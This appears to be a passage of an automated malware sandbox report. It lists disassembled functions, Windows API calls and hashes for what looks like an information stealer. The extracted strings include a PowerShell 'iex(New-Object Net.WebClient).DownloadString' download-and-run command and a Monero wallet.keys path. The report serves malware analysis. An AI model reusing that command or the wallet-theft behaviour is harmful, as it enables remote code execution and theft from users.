                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D98D90: GetFileAttributesA.KERNEL32(00000000,?,00D81B54,?,?,00DA564C,?,?,00DA0E1F), ref: 00D98D9F
                                  • Part of subcall function 00D94570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D94580
                                  • Part of subcall function 00D94570: RtlAllocateHeap.NTDLL(00000000), ref: 00D94587
                                  • Part of subcall function 00D94570: wsprintfA.USER32 ref: 00D945A6
                                  • Part of subcall function 00D94570: FindFirstFileA.KERNEL32(?,?), ref: 00D945BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: e1744eac7be3ee4a7023bac9374bc4a3e2fc948e68c19fb61983f15822361a52
                                • Instruction ID: ed9c771238f56d93d3b349b28b7ab573c378298a7f53fb294d193f9d39d0cb7c
                                • Opcode Fuzzy Hash: e1744eac7be3ee4a7023bac9374bc4a3e2fc948e68c19fb61983f15822361a52
                                • Instruction Fuzzy Hash: 97315EB690021CABCB14FBA0DC86EE9737CAB58704F404589B31996081EE75A6899FB5
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D92D85
                                Strings
                                • <, xrefs: 00D92D39
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00D92D04
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00D92CC4
                                • ')", xrefs: 00D92CB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 243fa3f8322fe44135887194ca1e3fbfee500e0af970502a97f1c0c07b5d2d61
                                • Instruction ID: 240cd50751a2e737755018fe407fec44675f6dc4a61f266418b9fa864317727f
                                • Opcode Fuzzy Hash: 243fa3f8322fe44135887194ca1e3fbfee500e0af970502a97f1c0c07b5d2d61
                                • Instruction Fuzzy Hash: D741BD72C10218AADF14EBA4C892BEDBB78EF14300F504119F116A7191DF746A4ACFF6
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00D89F41
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: b0cb57f19b044ba526febc9d83f78cabe884efee1f23cd77577c9e6f2d3f5a82
                                • Instruction ID: c801ee337f74abc9cabf43d70533e4f02bcdb9b00c895878546b27293f2da6fb
                                • Opcode Fuzzy Hash: b0cb57f19b044ba526febc9d83f78cabe884efee1f23cd77577c9e6f2d3f5a82
                                • Instruction Fuzzy Hash: 4B611D75A102489FDF14EFA8CC96BED77B5EF45300F048018F9095B595EB746A0ACBB2
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0182D900,00000000,00020119,?), ref: 00D940F4
                                • RegQueryValueExA.ADVAPI32(?,0182E2B8,00000000,00000000,00000000,000000FF), ref: 00D94118
                                • RegCloseKey.ADVAPI32(?), ref: 00D94122
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94147
                                • lstrcat.KERNEL32(?,0182E270), ref: 00D9415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 83462e381caf1be3d3bd2d9c407207c73ca9b3167ff8a3aaae8c90f95a54eaf2
                                • Instruction ID: 85ab994f33782407c8a1781d32cd2850e139a5e1c0cc4a9e72b899c82ff1bb12
                                • Opcode Fuzzy Hash: 83462e381caf1be3d3bd2d9c407207c73ca9b3167ff8a3aaae8c90f95a54eaf2
                                • Instruction Fuzzy Hash: 1C4153B690010C6BDB14EBA0ED57FFE737DEB88304F404558B61997181EA756B888BB2
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00D9696C
                                • sscanf.NTDLL ref: 00D96999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D969B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D969C0
                                • ExitProcess.KERNEL32 ref: 00D969DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: b39a0002547cafb2f47bf3aaf386e09c46bb0714d47a8a8220f6bfb7225fb360
                                • Instruction ID: 726a9f089d1d1382e863df569dd7819a784c9a00017bcf0e8f814638b66dcb44
                                • Opcode Fuzzy Hash: b39a0002547cafb2f47bf3aaf386e09c46bb0714d47a8a8220f6bfb7225fb360
                                • Instruction Fuzzy Hash: E821CB75D1420CABCF04EFE8D9469EEB7B5FF48304F04852AE506E3250EB34A605DBA9
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D97E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,0181C470,00000000,00020119,?), ref: 00D97E5E
                                • RegQueryValueExA.ADVAPI32(?,0182D6E0,00000000,00000000,000000FF,000000FF), ref: 00D97E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00D97E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 011a94472a30d3ab8d9faeb8bed50da7a8f097046eca52bb6db5ac88ce745348
                                • Instruction ID: 8b158d1e8e411b06683d82b857fb60ff2aba746732a03515a9815a419a4e17f9
                                • Opcode Fuzzy Hash: 011a94472a30d3ab8d9faeb8bed50da7a8f097046eca52bb6db5ac88ce745348
                                • Instruction Fuzzy Hash: B41151B1A4420DEBDB04CF95DE4AFBBBBB8FB44B14F104159F615A7280D77468009BA1
                                APIs
                                • StrStrA.SHLWAPI(0182E0A8,?,?,?,00D9140C,?,0182E0A8,00000000), ref: 00D9926C
                                • lstrcpyn.KERNEL32(00FCAB88,0182E0A8,0182E0A8,?,00D9140C,?,0182E0A8), ref: 00D99290
                                • lstrlen.KERNEL32(?,?,00D9140C,?,0182E0A8), ref: 00D992A7
                                • wsprintfA.USER32 ref: 00D992C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 34d66c7b63cb054b5be6a60f338ce02a2e5891d3fcc6f06422fa76a2df07fdee
                                • Instruction ID: ba23eb4572e952c6b91f46afb1aa0bfdd6351a77fc0b2a16678d679b5766b390
                                • Opcode Fuzzy Hash: 34d66c7b63cb054b5be6a60f338ce02a2e5891d3fcc6f06422fa76a2df07fdee
                                • Instruction Fuzzy Hash: B301ED7550010CFFCB04DFECCA59EAD7BB9EB44354F148188F90997241C631AE54EBA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D812B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D812BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D812D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D812F5
                                • RegCloseKey.ADVAPI32(?), ref: 00D812FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 3f215309666fa47f65aae465b92ee5509954207f447a0f53eb32cab17273b5fd
                                • Instruction ID: d65171232e60c42036756037b1c552681bc5330eb0262e0264f75901b8fe5a2f
                                • Opcode Fuzzy Hash: 3f215309666fa47f65aae465b92ee5509954207f447a0f53eb32cab17273b5fd
                                • Instruction Fuzzy Hash: 4D011DB9A4020CBBDB00DFE0DD4AFAEB7B8EB48705F008159FA0597280D670AA019B51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: c98812588727217b6014200a0123055f1aec2a8316b6f6b98b7e6429a67be600
                                • Instruction ID: b28f8e154a0d7075436feb24fc90b44a54ffe3e507c06a37dc66bba406321f5f
                                • Opcode Fuzzy Hash: c98812588727217b6014200a0123055f1aec2a8316b6f6b98b7e6429a67be600
                                • Instruction Fuzzy Hash: 8B4116B111079C6EDF218B248C94FFBBBE89B05705F1844E8E9CA87182E2719A44CF30
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00D96663
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D96726
                                • ExitProcess.KERNEL32 ref: 00D96755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: e0c95f89bdeeebbd03d3650d01f989bd9cbca9cea3819e2990a1b206d749a697
                                • Instruction ID: ee4ffaa7d9f80ffcb2568d9cd46caf96091d4a893a60e56ec815e1609b34ca5e
                                • Opcode Fuzzy Hash: e0c95f89bdeeebbd03d3650d01f989bd9cbca9cea3819e2990a1b206d749a697
                                • Instruction Fuzzy Hash: 163107B2801218ABDB14EB94DD96FDEB778EF04300F804189F20967191DF746A49CFBA
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00DA0E28,00000000,?), ref: 00D9882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D98836
                                • wsprintfA.USER32 ref: 00D98850
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 9853303521b8ae35abc97c83e64078fd3b25fe1e35d6e02afb89e0f42f7e963f
                                • Instruction ID: 0a039102b3aeb709c57ecc8dfac5a00c8cf9be88a796e241261150072d363e42
                                • Opcode Fuzzy Hash: 9853303521b8ae35abc97c83e64078fd3b25fe1e35d6e02afb89e0f42f7e963f
                                • Instruction Fuzzy Hash: 1421FEB1E4020CAFDB04DF94DE46FAEBBB8FB48715F104119F615A7280C779A9019BA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D9951E,00000000), ref: 00D98D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D98D62
                                • wsprintfW.USER32 ref: 00D98D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: a99f365cf6bf53ffccaa33ab3d6ff2d52822ec1a4c75a811628922fed4b8b20a
                                • Instruction ID: 3f775f4e1b3f182d72113115c2655e340d235ecbc8b382b8a35eec2b6d0cd003
                                • Opcode Fuzzy Hash: a99f365cf6bf53ffccaa33ab3d6ff2d52822ec1a4c75a811628922fed4b8b20a
                                • Instruction Fuzzy Hash: 50E08670A4020CBFD700DB94DD0AE5977B8EB04705F000054FD0987280D9716E009B66
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D8A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00D8A3FF
                                • lstrlen.KERNEL32(00000000), ref: 00D8A6BC
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00D8A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 608e5e2796fe59e2628d241812231a61dc0b00d5534907b13c9ac136fc205d06
                                • Instruction ID: c229c283cdb1be5cbf2127c4e11487f7f1bbd3cd7f58a341ac939967314d0430
                                • Opcode Fuzzy Hash: 608e5e2796fe59e2628d241812231a61dc0b00d5534907b13c9ac136fc205d06
                                • Instruction Fuzzy Hash: 53E1BB73820118AADF05FBA8DD92EEE7338EF54300F508169F51676091EE346A4DDBB6
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D8D481
                                • lstrlen.KERNEL32(00000000), ref: 00D8D698
                                • lstrlen.KERNEL32(00000000), ref: 00D8D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00D8D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 7c9edd23d3594b96ac23d06ad67a1a071f37a7bd60aa0871cf324b730752156c
                                • Instruction ID: 651b1dae39db0cfcba11b98ed1010d876fde0cdffccabd7c889909727fc79729
                                • Opcode Fuzzy Hash: 7c9edd23d3594b96ac23d06ad67a1a071f37a7bd60aa0871cf324b730752156c
                                • Instruction Fuzzy Hash: F591D873920118ABDF04FBA8DD96EEE7338EF14304F504169F516A6091EF346A09DBB6
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D8D801
                                • lstrlen.KERNEL32(00000000), ref: 00D8D99F
                                • lstrlen.KERNEL32(00000000), ref: 00D8D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00D8DA32
                                Memory Dump Source
